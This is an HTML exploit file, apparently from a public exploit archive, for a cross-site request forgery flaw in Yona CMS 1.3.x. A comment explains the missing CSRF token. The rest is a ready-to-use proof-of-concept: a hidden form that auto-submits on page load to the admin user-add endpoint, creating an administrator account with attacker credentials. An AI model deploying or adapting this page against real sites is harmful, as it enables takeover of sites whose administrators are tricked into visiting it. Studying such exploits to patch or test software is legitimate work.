
34 lines
No EOL
1.2 KiB
HTML
Executable file
<!--
# Exploit Title: Yona CMS <= 1.3.x Remote Admin Add CSRF Exploit
# Exploit Author: s0nk3y
# Google Dork: -
# Date: 21/06/2016
# Vendor Homepage: http://yonacms.com
# Software Link: https://github.com/oleksandr-torosh/yona-cms/
# Version: 1.3.x
# Tested on: Ubuntu 16.04

Yona CMS is vulnerable to a CSRF attack (no CSRF token is in place), meaning
that if an admin user can be tricked into visiting a crafted URL created by
the attacker (via spear phishing/social engineering), a form will be submitted
to http://localhost/admin/admin-user/add that will add a new user as
administrator.

Once exploited, the attacker can log in to the admin panel
(http://localhost/admin) using the username and the password he posted in the
form.

CSRF PoC Code
=============
-->

<form method="post" action="http://localhost/admin/admin-user/add">
  <input type="hidden" name="login" value="attacker"/>
  <input type="hidden" name="email" value="attacker@email.com"/>
  <input type="hidden" name="name" value="attacker"/>
  <input type="hidden" name="role" value="admin"/>
  <input type="hidden" name="password" value="attackerPassword"/>
  <input type="hidden" name="active"/>
</form>
<script>
document.forms[0].submit();
</script>